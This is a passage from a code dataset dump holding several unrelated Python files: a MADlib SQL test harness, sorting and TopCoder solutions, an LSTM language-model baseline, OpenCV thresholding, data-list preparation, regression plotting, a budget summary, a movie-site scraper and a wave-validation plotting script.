cls._make_sure_path_exists(out_dir)\n\n # ------------------------------------------------\n # Also create our \"Template\" test cases\n def makeTest(x):\n cls.incr_ += 1\n x[\"incr_\"] = cls.incr_\n methodName = TINCTestLoader.testMethodPrefix + \\\n template_method.format(**x)\n methodDoc = template_doc.format(**x)\n methodQuery = template.format(**x)\n\n ## Skip a test case\n add_flag = True\n for case in skip:\n eq = True\n for key in case:\n if str(x[key]).lower() != str(case[key]).lower():\n eq = False\n break\n if eq:\n add_flag = False\n break\n\n if cls.create_case_:\n # Create the SQL test case file that we are going to run\n sql_inputfile = os.path.join(sql_dir, methodName + \".sql\")\n with open(sql_inputfile, 'w') as f:\n if methodDoc == \"\" or methodDoc is None:\n f.write(\"-- @description \" + cls.__module__ + \".\"\n + cls.__name__ + \".\" + methodName + \"\\n\")\n else:\n if isinstance(methodDoc, str):\n f.write(\"-- @description \" + methodDoc + \"\\n\")\n else:\n sys.exit(\"MADlib Test Error: template_doc\",\n \" must be a string in\" +\n cls.__module__ + \".\" + cls.__name__)\n\n if add_flag is False:\n f.write(\"-- @skip ... by \" + cls.__module__ + \".\" +\n cls.__name__ + \"\\n\")\n\n biprint(methodName + \" ...... TEST CASE FILE CREATED\")\n\n cls._write_params(f, x)\n f.write(\"\\n\")\n f.write(methodQuery)\n\n # Call external script to compute the result\n # right now, only support R\n # But it is very easy to add support for other softwares\n if r_ans:\n output_msg = cls._get_env_flag(\"R_OUT\", False)\n t0 = time.time()\n if os.path.exists(r_script):\n call_R_script(r_script, ans_dir, methodName, x, output_msg)\n elif os.path.exists(\"./\" + r_script):\n call_R_script(\"./\" + r_script, ans_dir, methodName,\n x, output_msg)\n else:\n r_path = os.path.join(ans_dir, r_script)\n call_R_script(r_path, ans_dir, methodName, x, output_msg)\n t1 = time.time()\n biprint(cls.__name__ + \".\" + methodName +\n \" ... ANSWER GENERATED BY R ... \" +\n \"{dt:.2f}\".format(dt=(t1 - t0) * 1000.) +\n \" ms ... ok\")\n\n # ------------------------------------------------\n\n cls.clean_dirs_ = cls._get_env_flag(\"CLEANUP\")\n if cls.clean_dirs_:\n biprint(cls.__name__ + \" ...... cleaning up folders\")\n biprint(\"cleaning up test case files in \" + sql_dir)\n clean_dir(sql_dir, \"*\")\n # biprint(\"cleaning up answer files in \" + ans_dir)\n # clean_dir(ans_dir, \"*.ans\")\n biprint(\"cleaning up result files in \" + out_dir)\n clean_dir(out_dir, \"*\")\n return []\n\n # ------------------------------------------------\n # create test case files\n if cls.create_case_ or (cls.create_ans_ and r_ans):\n # if cls.create_case_:\n # clean_dir(sql_dir, \"*\")\n\n # if cls.create_ans_:\n # clean_dir(out_dir, \"*\")\n # # clean_dir(ans_dir, \"*.ans\")\n\n skip = cls._get_skip()\n\n for template_dict in cls.template_vars:\n makeTestClosure = makeTest\n kwargs = {}\n for key, value in template_dict.iteritems():\n if not isinstance(value, list):\n kwargs[key] = value\n else:\n def makefunc(key, values, f):\n def doit(k):\n for v in values:\n k[key] = v\n f(k)\n return doit\n makeTestClosure = makefunc(key, value, makeTestClosure)\n\n makeTestClosure(kwargs)\n\n # if R has already created answers, stop\n if ((not cls.create_case_ and not r_ans) or\n (cls.create_ans_ and (not r_ans))):\n # if cls.create_case_:\n # clean_dir(sql_dir, \"*\")\n\n # if cls.create_ans_:\n # clean_dir(out_dir, \"*\")\n # # clean_dir(ans_dir, \"*.ans\")\n\n # read files to create test cases\n return super(MADlibTestCase, cls).loadTestsFromTestCase()\n else:\n return []\n\n # ----------------------------------------------------------------\n\n def __init__(self, methodName, sql_file=None, db_name=None):\n super(MADlibTestCase,\n self).__init__(methodName, sql_file,\n self.__class__.db_settings_[\"dbname\"])\n\n # ----------------------------------------------------------------\n\n def _run_test(self, sql_file, ans_file):\n \"\"\"\n (1) Create a SQL script for the query\n (2) Run the SQL script using psql to produce the result file\n (3) Compare the result file to the expected answer file\n \"\"\"\n sql_resultfile = os.path.join(self.get_out_dir(),\n os.path.basename(sql_file) + \".out\")\n\n # create the output of SQL script\n db = self.__class__.db_settings_\n PSQL1.run_sql_file(sql_file, out_file=sql_resultfile,\n dbname=db[\"dbname\"],\n username=db[\"username\"],\n password=db[\"userpwd\"],\n host=db[\"host\"],\n port=db[\"port\"],\n PGOPTIONS=db[\"pg_options\"],\n psql_options=db[\"psql_options\"])\n\n # First run to create the baseline file\n if self.__class__.create_ans_:\n shutil.copyfile(sql_resultfile, ans_file)\n os.remove(sql_resultfile)\n biprint(\"ANSWER FILE CREATED ... \", syswrite=True)\n return True\n\n return self.validate(sql_resultfile, ans_file)\n\n # ----------------------------------------------------------------\n\n def validate(self, sql_resultfile, answerfile):\n # Check that the answer file exists\n self.assertTrue(os.path.exists(answerfile))\n\n tmp = unique_string()\n res1 = self._filter_file(sql_resultfile, tmp, \"sql.out\")\n ans1 = self._filter_file(answerfile, tmp, \"ans\")\n\n cmp = Gpdiff1.are_files_equal(res1, ans1)\n\n diff_file = res1.replace(\"out\", \"diff\")\n if os.path.exists(diff_file):\n os.system(\"mv -f \" + diff_file + \" \" +\n sql_resultfile.replace(\"out\", \"diff\"))\n\n # clean up\n os.system(\"rm -f \" + res1 + \" \" + ans1)\n\n # Compare actual result to the answer\n return cmp\n\n # -----------------------------------------------------------------\n\n def _filter_file(self, filename, tmpbase, extension):\n \"\"\" Copy filename to /tmp/tmpbase.ans (or sql.out)\n Filter somthing if needed\n \"\"\"\n tmpfile = \"/tmp/\" + tmpbase + \".\" + extension\n to = open(tmpfile, \"w\")\n context_skip = False\n query_skip = False\n error_found = False\n all_skip = False\n for line in open(filename, \"r\"):\n if re.match(\"^.*\\s+(?i)error:\", line):\n error_found = True\n all_skip = True\n if line.startswith(\"QUERY:\"):\n if error_found:\n all_skip = True\n query_skip = True\n if line.startswith(\"CONTEXT:\"):\n if error_found:\n all_skip = True\n context_skip = True\n query_skip = False\n if re.match(\"^\\s*(select|drop)\", line):\n context_skip = False\n if context_skip or query_skip: continue\n # All the messages after \"\\\\n\" will be ignored by GPdiff\n to.write(line)\n \n if all_skip: break\n to.close()\n return tmpfile\n\n # ----------------------------------------------------------------\n\n def compare_outputs(self, sql_resultfile, answerfile, keys,\n ignore=[], #\n grouping=[], # grouping columns\n skip_null=True, # do not compare NULL\n compare=relative_mean_squared_error,\n threshold=1e-6):\n \"\"\"\n Compare the result file with answer file\n \"\"\"\n if isinstance(threshold, list):\n if len(threshold) != len(keys):\n raise Exception(\"Threshold number is different from keys number!\")\n else:\n threshold = [threshold] * len(keys)\n\n r_res = parse_single_R_output(answerfile, keys)\n\n sql_dict = {}\n for i, key in enumerate(keys):\n sql_dict[key] = i\n\n sql_result = read_sql_result(sql_resultfile)\n sql_res = parse_single_SQL_output(sql_result[\"result\"], sql_dict)\n\n flag = True\n if grouping != [] and isinstance(r_res, list):\n if len(sql_res) != len(r_res):\n raise Exception(\"The numbers of groups of R and SQL are different!\")\n count = 0\n for i in range(len(r_res)):\n for j in range(len(sql_res)):\n if (dict((k, r_res[i][k]) for k in grouping) ==\n dict((k, sql_res[j][k]) for k in grouping)):\n count += 1\n if len(sql_res[j]) != len(r_res[i]):\n raise Exception(\"The numbers of result items of R and SQL \"\n \"are different!\")\n for k, params in enumerate(keys):\n if skip_null and (sql_res[j][params] == [\"\"] or\n sql_res[j][params] == [] or\n r_res[i][params] == [\"NA\"] or\n r_res[i][params] == []):\n continue\n if (params not in ignore and params not in grouping and\n compare(sql_res[j][params], r_res[i][params]) > threshold[k]):\n # biprint(\"Assertion for \" + params + \" failed!\")\n raise ValueError(\"Assertion for \" + params + \" failed!\")\n flag = False\n if flag and count != len(r_res): flag = False\n else:\n if len(sql_res) != len(r_res):\n raise Exception(\"The numbers of result items of R and SQL \"\n \"are different!\")\n for k, params in enumerate(keys):\n if skip_null and (sql_res[params] == [\"\"] or\n sql_res[params] == [] or\n r_res[params] == [\"NA\"] or\n r_res[params] == []):\n continue\n if (params not in ignore and params not in grouping and\n compare(sql_res[params], r_res[params]) > threshold[k]):\n # biprint(\"Assertion for \" + params + \" failed!\")\n raise ValueError(\"Assertion for \" + params + \" failed!\")\n flag = False\n return flag\n","sub_path":"src/template/madlib_test.py","file_name":"madlib_test.py","file_ext":"py","file_size_in_byte":20198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"502301936","text":"# encoding: utf-8\nimport random\n\n\ndef recquickSort(arr, first, last):\n if first >= last:\n return\n\n pos = findPos(arr, first, last)\n\n recquickSort(arr, first, pos-1)\n recquickSort(arr, pos+1, last)\n\n\ndef findPos(arr, first, last):\n base = arr[first]\n i = first + 1\n j = last\n while i <= j:\n while i <= j and arr[i] < base:\n i += 1\n while j >= i and arr[j] >= base:\n j -= 1\n if i < j:\n arr[i], arr[j] = arr[j], arr[i]\n i += 1\n j -= 1\n\n arr[first], arr[j] = arr[j], arr[first]\n return j\n\n\nif __name__ == \"__main__\":\n arr = [random.randint(0, 10) for i in range(10)]\n print(arr)\n recquickSort(arr, 0, len(arr)-1)\n print(arr)\n","sub_path":"datastructures/sorts/quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"602668595","text":"# http://community.topcoder.com/stat?c=problem_statement&pm=12794\n\ndef get_number(balls):\n curr_seq = 1\n max_seq = 1\n if len(balls) == 1:\n return 0\n\n for idx in xrange(len(balls)):\n if balls[idx - 1] == balls[idx]:\n curr_seq += 1\n else:\n curr_seq = 1\n max_seq = max(max_seq, curr_seq)\n return len(balls) - max_seq\n\n\nif __name__ == '__main__':\n assert 4 == get_number('RRGGBB')\n assert 5 == get_number('RGBRGB')\n assert 3 == get_number('RGGGBB')\n assert 46 == get_number('RGBRBRGRGRBBBGRBRBRGBGBBBGRGBBBBRGBGRRGGRRRGRBBBBR')\n assert 0 == get_number('R')\n","sub_path":"topcoder/little_elephant_and_balls_again/little_elephant_and_balls_again.py","file_name":"little_elephant_and_balls_again.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"274564668","text":"import numpy as np\nimport tensorflow as tf\n\nfrom models.tf_model import TFModel\nfrom models.base_model import convert_tokens_to_input_and_target\n\n\nclass LSTMBaseline(TFModel):\n \"\"\"LSTM language model\n\n Trained on songs from the meta-training set. During evaluation,\n ignore each episode's support set and evaluate only on query set.\n \"\"\"\n\n def __init__(self, config):\n super(LSTMBaseline, self).__init__(config)\n\n def _define_placedholders(self):\n # Add start word that starts every song\n # Adding start word increases the size of vocabulary by 1\n self._start_word = self._config['input_size']\n self._input_size = self._config['input_size'] + 1\n\n self._time_steps = self._config['max_len']\n self._embd_size = self._config['embedding_size']\n self._hidden_size = self._config['hidden_size']\n self._n_layers = self._config['n_layers']\n self._lr = self._config['lr']\n self._max_grad_norm = self._config['max_grad_norm']\n\n self._batch_size = tf.placeholder(tf.int32, shape=())\n self._seq_length = tf.placeholder(tf.int32, [None])\n self._words = tf.placeholder(\n tf.int32, [None, self._time_steps])\n self._target = tf.placeholder(\n tf.int32, [None, self._time_steps])\n\n def _build_graph(self):\n embedding = tf.get_variable(\n 'embedding', [self._input_size, self._embd_size])\n inputs = tf.nn.embedding_lookup(embedding, self._words)\n inputs = tf.unstack(inputs, axis=1)\n\n def make_cell():\n return tf.contrib.rnn.BasicLSTMCell(\n self._hidden_size, forget_bias=1., state_is_tuple=True)\n\n self._cell = tf.contrib.rnn.MultiRNNCell(\n [make_cell() for _ in range(self._n_layers)])\n self._initial_state = self._cell.zero_state(\n self._batch_size, dtype=tf.float32)\n outputs, state = tf.nn.static_rnn(\n self._cell, inputs, initial_state=self._initial_state,\n sequence_length=self._seq_length)\n self._state = state\n\n output = tf.concat(outputs, 1)\n self._output = tf.reshape(output, [-1, self._hidden_size])\n\n softmax_w = tf.get_variable(\n 'softmax_w', [self._hidden_size, self._input_size])\n softmax_b = tf.get_variable('softmax_b', [self._input_size])\n # Reshape logits to be a 3-D tensor for sequence loss\n logits = tf.nn.xw_plus_b(self._output, softmax_w, softmax_b)\n logits = tf.reshape(\n logits, [self._batch_size, self._time_steps, self._input_size])\n self._logits = logits\n self._prob = tf.nn.softmax(self._logits)\n\n self._avg_neg_log = tf.contrib.seq2seq.sequence_loss(\n logits,\n self._target,\n tf.ones([self._batch_size, self._time_steps], dtype=tf.float32),\n average_across_timesteps=True,\n average_across_batch=True)\n\n lr = tf.train.exponential_decay(\n self._lr,\n self._global_step,\n self._config['n_decay'], 0.5, staircase=False\n )\n optimizer = tf.train.AdamOptimizer(lr)\n grads, _ = tf.clip_by_global_norm(tf.gradients(self._avg_neg_log,\n self.get_vars()),\n self._max_grad_norm)\n self._train_op = optimizer.apply_gradients(zip(grads, self.get_vars()),\n self._global_step)\n\n def train(self, episode):\n \"\"\"Concatenate query and support sets to train.\"\"\"\n X, Y = convert_tokens_to_input_and_target(\n episode.support, self._start_word)\n X2, Y2 = convert_tokens_to_input_and_target(\n episode.query, self._start_word)\n X = np.concatenate([X, X2])\n Y = np.concatenate([Y, Y2])\n\n feed_dict = {}\n feed_dict[self._words] = X\n feed_dict[self._target] = Y\n feed_dict[self._batch_size] = np.shape(X)[0]\n feed_dict[self._seq_length] = [np.shape(X)[1]] * np.shape(X)[0]\n\n _, loss = self._sess.run([self._train_op, self._avg_neg_log],\n feed_dict=feed_dict)\n if self._summary_writer:\n summary = tf.Summary(value=[\n tf.Summary.Value(tag='Train/loss',\n simple_value=loss)])\n self._summary_writer.add_summary(summary, self._train_calls)\n self._train_calls += 1\n\n return loss\n\n def eval(self, episode):\n \"\"\"Ignore support set and evaluate only on query set.\"\"\"\n X, Y = convert_tokens_to_input_and_target(\n episode.query, self._start_word)\n\n feed_dict = {}\n feed_dict[self._words] = X\n feed_dict[self._target] = Y\n feed_dict[self._batch_size] = np.shape(X)[0]\n feed_dict[self._seq_length] = [np.shape(X)[1]] * np.shape(X)[0]\n avg_neg_log = self._sess.run(self._avg_neg_log, feed_dict=feed_dict)\n if self._summary_writer is not None:\n summary = tf.Summary(value=[\n tf.Summary.Value(tag='Eval/Avg_NLL',\n simple_value=avg_neg_log)])\n self._summary_writer.add_summary(summary, self._eval_calls)\n self._eval_calls += 1\n\n return avg_neg_log\n\n def sample(self, support_set, num):\n \"\"\"Ignore support set for sampling.\"\"\"\n pred_words = []\n word = self._start_word\n\n state = self._sess.run(self._cell.zero_state(1, tf.float32))\n x = np.zeros((1, self._time_steps))\n for i in range(num):\n x[0, 0] = word\n feed_dict = {}\n feed_dict[self._words] = x\n feed_dict[self._batch_size] = 1\n feed_dict[self._seq_length] = [1]\n feed_dict[self._initial_state] = state\n\n probs, state = self._sess.run([self._prob, self._state],\n feed_dict=feed_dict)\n p = probs[0][0]\n word = np.argmax(p)\n pred_words.append(word)\n\n return pred_words\n","sub_path":"src/models/lstm_baseline.py","file_name":"lstm_baseline.py","file_ext":"py","file_size_in_byte":6125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"57131908","text":"import cv2 as cv\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimg = cv.imread('1.jpg',0)\nimg = cv.medianBlur(img,5)\nret,th1 = cv.threshold(img,127,255,cv.THRESH_BINARY)\nth2 = cv.adaptiveThreshold(img,255,cv.ADAPTIVE_THRESH_MEAN_C,\\\n cv.THRESH_BINARY,11,2)\nth3 = cv.adaptiveThreshold(img,255,cv.ADAPTIVE_THRESH_GAUSSIAN_C,\\\n cv.THRESH_BINARY,11,2)\ntitles = ['Original Image', 'Global Thresholding (v = 127)',\n 'Adaptive Mean Thresholding', 'Adaptive Gaussian Thresholding']\nimages = [img, th1, th2, th3]\n\n\n# for i in range(4):\n# plt.subplot(2,2,i+1),plt.imshow(images[i],'gray')\n# plt.title(titles[i])\n# plt.xticks([]),plt.yticks([])\n\n\nedged = cv.Canny(th3, 170, 200)\n(cnts, _) = cv.findContours(edged.copy(),\n cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)\nfor c in cnts:\n x, y, w, h = cv.boundingRect(c)\n if w>5 and h>10:\n cv.rectangle(img, (x, y), (x + w, y + h), (255,255,255), 1)\n \nimg = cv.resize(img,(1000,1000))\ncv.imshow(\"th3\",img)\ncv.waitKey(0)\n# plt.show()","sub_path":"adaptivethresholding/thresholding.py","file_name":"thresholding.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"572203185","text":"###############################################################\r\n#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n#\t\tprepare_PLSD_filelists.py\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n#\t\t\tsplit the file into training and testing\t\t\t\t\t\t\t\t#\r\n#\t\t\toutput: train_files_for_val_on_city_%s.txt\t\t\t\t\t\t\t#\r\n#\t\t\t\t\t\t\ttrain_files_for_val_on_city_%s.txt\t\t\t\t\t\t\t#\r\n#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n#\t\tAuthor: Yuheng Lu\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n#\t\tMail:\t\tyuhenglu@pku.edu.cn\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n###############################################################\r\n\r\nimport os\r\nimport math\r\nimport random\r\nimport argparse\r\nfrom datetime import datetime\r\n\r\nDEFAULT_DATA_DIR = '../../data/PLSD'\r\n\r\ndef main():\r\n\tparser = argparse.ArgumentParser()\r\n\tparser.add_argument('--folder', '-f', help='Path to data folder',default=DEFAULT_DATA_DIR)\r\n\tparser.add_argument('--h5_num', '-d', help='Number of h5 files to be loaded each time', type=int, default=8)\r\n\tparser.add_argument('--repeat_num', '-r', help='Number of repeatly using each loaded h5 list', type=int, default=2)\r\n\targs = parser.parse_args()\r\n\tprint(args)\r\n\t\r\n\troot = args.folder\r\n\t\r\n\tpath_dir_citys = sorted(os.listdir(root))\r\n\tcity_num = len(path_dir_citys)\r\n\tcity_h5s = [[] for _ in range(city_num)]\r\n\tprint(city_h5s)\r\n\r\n\tfor city_idx,city in enumerate(path_dir_citys):\r\n\t\tfolder = os.path.join(root, city)\r\n\t\tdatasets = [dataset for dataset in os.listdir(folder)]\r\n\t\tprint(datasets)\r\n\t\tfor dataset in datasets:\r\n\t\t\tfolder_dataset = os.path.join(folder, dataset)\r\n\t\t\tfilename_h5s = []\r\n\t\t\th5_filename = os.listdir(folder_dataset)\r\n\t\t\tfor filename in h5_filename:\r\n\t\t\t\tif filename.endswith('.h5'):\r\n\t\t\t\t\tfilename_h5s.append(os.path.join(folder_dataset,filename))\r\n\t\t\t\t\t\r\n\t\t\tcity_h5s[city_idx].extend(filename_h5s)\r\n\t\t\r\n\t\tprint(city_h5s[city_idx])\r\n\t\r\n\t\r\n\tfor city_idx,city in enumerate(path_dir_citys):\r\n\t\ttrain_h5 = []\r\n\t\tfor idx in range(city_num):\r\n\t\t\tif idx != city_idx:\r\n\t\t\t\tfor filename in city_h5s[idx]:\r\n\t\t\t\t\ttrain_h5.append(filename)\r\n\t\t\r\n\t\trandom.shuffle(train_h5)\r\n\t\ttrain_list = os.path.join(root, 'train_files_for_val_on_%s.txt' % (city))\r\n\t\tprint('{}-Saving {}...'.format(datetime.now(), train_list))\r\n\t\twith open(train_list, 'w') as filelist:\r\n\t\t\tlist_num = math.ceil(len(train_h5) / args.h5_num)\r\n\t\t\tfor list_idx in range(list_num):\r\n\t\t\t\ttrain_val_list_i = os.path.join(root, 'filelists','train_files_for_val_on_%s_g_%d.txt' % (city, list_idx))\r\n\t\t\t\tos.makedirs(os.path.dirname(train_val_list_i), exist_ok=True)\r\n\t\t\t\twith open(train_val_list_i, 'w') as filelist_i:\r\n\t\t\t\t\tfor h5_idx in range(args.h5_num):\r\n\t\t\t\t\t\tfilename_idx = list_idx * args.h5_num + h5_idx\r\n\t\t\t\t\t\tif filename_idx > len(train_h5) - 1:\r\n\t\t\t\t\t\t\tbreak\r\n\t\t\t\t\t\tfilename_h5 = train_h5[filename_idx]\r\n\t\t\t\t\t\tfilelist_i.write('../' + filename_h5 + '\\n')\r\n\t\t\t\tfor repeat_idx in range(args.repeat_num):\r\n\t\t\t\t\tfilelist.write('./filelists/train_files_for_val_on_%s_g_%d.txt\\n' % (city, list_idx))\r\n\t\t\r\n\t\tval_h5 = city_h5s[city_idx]\r\n\t\tval_list = os.path.join(root, 'val_files_%s.txt' % city)\r\n\t\tprint('{}-Saving {}...'.format(datetime.now(), val_list))\r\n\t\twith open(val_list, 'w') as filelist:\r\n\t\t\tfor filename_h5 in val_h5:\r\n\t\t\t\tfilelist.write(filename_h5+'\\n')\r\n\r\n\t\r\n\t\r\nif __name__ == '__main__':\r\n\tmain()","sub_path":"data_conversions/prepare_PLSD_filelists.py","file_name":"prepare_PLSD_filelists.py","file_ext":"py","file_size_in_byte":3207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"224889655","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nimport pickle\nimport numpy as np\nimport sklearn.linear_model as lm\nimport sklearn.metrics as sm\nimport matplotlib.pyplot as mp\n# 读取训练数据\nx, y = [], []\nwith open('../../data/single.txt', 'r') as f:\n for line in f.readlines():\n data = [float(substr) for substr\n in line.split(',')]\n x.append(data[:-1])\n y.append(data[-1])\n# 二维数组形式的输入矩阵,一行一样本,一列一特征\nx = np.array(x)\n# 一维数组形式的输出序列,每个元素对应一个输入样本\ny = np.array(y)\n# 加载模型\nwith open('../../data/linear.pkl', 'rb') as f:\n model = pickle.load(f)\n# 根据给定的输入预测对应的输出\npred_y = model.predict(x)\n# 评估指标\nprint(sm.mean_absolute_error(y, pred_y)) # 平均绝对值误差\nprint(sm.mean_squared_error(y, pred_y)) # 平均平方误差\nprint(sm.median_absolute_error(y, pred_y)) # 中位绝对值误差\nprint(sm.r2_score(y, pred_y)) # R2得分[0,1]\n# 可视化回归曲线\nmp.figure('Linear Regression', facecolor='lightgray')\nmp.title('Linear Regression', fontsize=20)\nmp.xlabel('x', fontsize=14)\nmp.ylabel('y', fontsize=14)\nmp.tick_params(labelsize=10)\nmp.grid(linestyle=':')\nmp.scatter(x, y, c='dodgerblue', alpha=0.75, s=60,\n label='Sample')\nsorted_indices = x.T[0].argsort()\nmp.plot(x[sorted_indices], pred_y[sorted_indices],\n c='orangered', label='Regression')\nmp.legend()\nmp.show()\n","sub_path":"AI/ML/code/day02/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"245472388","text":"import os\nimport csv\n\ntotalmonth=0.0\ntotalprofitloss=0\nprofitloss =[]\nmonth=[]\nvaluechange=0\nVal=[]\ni=0\nlist=[]\ntotalvaluechange=0.0\nbankdata = os.path.join('..','..','..','..', 'Resources', 'budget_data.csv')\nwith open(bankdata, newline=\"\") as csvfile:\n csvreader = csv.reader(csvfile, delimiter=\",\")\n # read header\n csv_header = next(csvfile)\n print(f\"Header: {csv_header}\")\n\n for row in csvreader:\n# print(row)\n totalmonth += 1\n# calculating total profit and loss\n totalprofitloss = float(totalprofitloss + (int(row[1])))\n month.append(row[0])\n profitloss.append(row[1])\n def changevalue(startpoint,currentpoint):\n return(float(int(currentpoint)-int(startpoint)))\n\n# print(f\"total month : {totalmonth}\")\n # print(f\"total profit and loss : {totalprofitloss}\")\nfor eachn in profitloss:\n val = float(changevalue(profitloss[i - 1], eachn))\n Val.append(val)\n i = i + 1\nVal[0]=0\n#print(f\"total value change :{Val}\")\n#calculation Average change Value\nfor i in range(len(Val)):\n totalvaluechange = totalvaluechange+Val[i]\nAveragevaluechange=round(totalvaluechange/i,2)\n\n# finding greatest increase and Decrease\nmaxval=max(Val)\nminval=min(Val)\nx=Val.index(maxval)\ny=Val.index(minval)\n\n\n#val_zip=zip(month,profitloss,Val)\n\n#printing final output\n\nprint(f\"Total Months: {totalmonth}\")\nprint(f\"Total: {totalprofitloss}\")\nprint(f\"Average Change: {Averagevaluechange}\")\nprint(f\"Greatest Increase in Profits: {month[x]} (${maxval})\")\nprint(f\"Greatest Decrease in Profits: {month[y]} (${minval})\")\n\n","sub_path":"python/PyBank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"575697558","text":"# -*- codeing=utf-8 -*-\n# @Time:2021/3/15 14:22\n# @Author:\n# @File:1_maoyanmovie.py.py\n# @Software:PyCharm\nimport requests\nfrom fake_useragent import UserAgent\nimport random\nimport json\nfrom lxml import etree\nimport time\n\nrequests.packages.urllib3.disable_warnings()\nua = UserAgent()\nua = ua.chrome\n\n\ndef crawel(url):\n headers = {\n \"user-agent\": ua,\n }\n res = requests.get(url, headers=headers, verify=False, timeout=15)\n # time.sleep(5)\n # print(res.text)\n return res.text\n\n\ndef parse_xpath(html):\n results = []\n html = etree.HTML(html)\n title_xpath = \"//h2[@class=\\\"m-b-sm\\\"]/text()\"\n score_xpath = \"//p[@class=\\\"score m-t-md m-b-n-sm\\\"]/text()\"\n # type_xpath = \"//div[@class=\\\"categories\\\"]//span/text()\"\n for i in range(0, 10):\n result_dict = {} # 注意字典的位置\n type_xpath = f\"//div[@class=\\\"el-col el-col-18 el-col-offset-3\\\"]/div[{i + 1}]//div[@class=\\\"categories\\\"]//span/text()\"\n result_dict['title'] = html.xpath(title_xpath)[i]\n result_dict['score'] = str(html.xpath(score_xpath)[i]).strip()\n result_dict['type'] = \";\".join(html.xpath(type_xpath))\n print(result_dict)\n # print(result_dict['type'])\n results.append(result_dict)\n # print(results)\n return results\n\n\ndef save_txt(result):\n with open(\"./data/1_maoyan.txt\", \"a\", encoding='utf-8') as fp:\n fp.write(str(result) + \"\\n\")\n\n\ndef main():\n results_list = []\n for i in range(1, 11):\n url = \"https://ssr1.scrape.center/page/{}\".format(i)\n # time.sleep(random.randint(3,5))\n # print(url)\n html = crawel(url)\n results = parse_xpath(html)\n for item in results:\n save_txt(item)\n\n\nmain()\n","sub_path":"python爬虫/spider_center/1_maoyanmovie.py","file_name":"1_maoyanmovie.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"533534211","text":"#!/usr/bin/env python\n\nimport sys\nimport os\nfrom datetime import datetime, timedelta\nfrom copy import deepcopy\nimport argparse\nfrom argparse import RawTextHelpFormatter\nimport yaml\n\nsys.path.append('../../wavy')\n\nfrom graphicsmod import make_val_ts_fig_op, make_val_scatter_fig_op\nfrom ncmod import get_arcmfc_stats, get_arcmfc_ts\n\n# parser\nparser = argparse.ArgumentParser(\n description=\"\"\"\nCreate validation figures for validation files based on satellite altimetry.\nUsage:\n./op_figures.py -mod mwam4\n \"\"\",\n formatter_class = RawTextHelpFormatter\n )\nparser.add_argument(\"-mod\", metavar='model',\n help=\"model to be evaluated\")\nparser.add_argument(\"-sat\", metavar='satellite',\n help=\"satellite mission to be used for collocation\")\nparser.add_argument(\"-reg\", metavar='region',\n help=\"region of interest\")\nparser.add_argument(\"-d\", metavar='date',\n help=\"month to be plotted fmt: %Y%m\")\nparser.add_argument(\"-path\", metavar='outpath',\n help=\"path to where files are to be stored\")\n\nargs = parser.parse_args()\n\nvarlst = ['Hs']\nnow = datetime.now()\n\nif args.d is None:\n fc_date = datetime.now()\nelse:\n fc_date = datetime(int(args.d[0:4]),int(args.d[4:6]),1)\n\nleadtimes = [0,24,48]\n\nif args.mod is None:\n args.mod = 'mwam4'\n\nif args.sat is None:\n args.sat = 's3a'\n\nif args.reg is None:\n args.reg = args.mod\n\nif args.path is None:\n args.path = '/lustre/storeB/project/fou/om/waveverification/'\n\n# make a list of validation metrics for various lead times\nrmsd_lst = []\nbias_lst = []\ncorr_lst = []\nSI_lst = []\nnov_lst = []\ndtime_lst = []\nfor element in leadtimes:\n # Get stats ts\n inpath = (args.path\n + args.mod + '/satellites/altimetry'\n + '/' + args.sat + '/'\n + 'ValidationFiles/'\n + fc_date.strftime('%Y/%m/'))\n filename_stat = fc_date.strftime(args.mod\n + \"_vs_\" + args.sat\n + \"_for_\" + args.reg\n + \"_val_ts_lt\"\n + \"{:0>3d}\".format(element)\n + \"h_%Y%m.nc\")\n valid_dict, dtime = get_arcmfc_stats(inpath + filename_stat)\n rmsd_lst.append(valid_dict['rmsd'])\n bias_lst.append(valid_dict['bias'])\n corr_lst.append(valid_dict['corr'])\n SI_lst.append(valid_dict['SI'])\n nov_lst.append(valid_dict['nov'])\n dtime_lst.append(dtime)\n\nvalid_dict_lst = {'rmsd':rmsd_lst,\n 'bias':bias_lst,\n 'corr':corr_lst,\n 'SI':SI_lst,\n 'nov':nov_lst}\n\n# Make ts-plots\nfor val_name in valid_dict_lst:\n filename_fig = fc_date.strftime(args.mod \n + \"_vs_\" + args.sat\n + \"_for_\" + args.reg\n + \"_fig_val\" \n + \"_ts_\" + val_name\n + \"_%Y%m.png\")\n ts = valid_dict_lst[val_name]\n make_val_ts_fig_op(val_name,ts,dtime_lst,filename_fig,leadtimes)\n\n# Get collocation ts\ndtime_lst = []\nsHs_lst = []\nmHs_lst = []\nfor element in 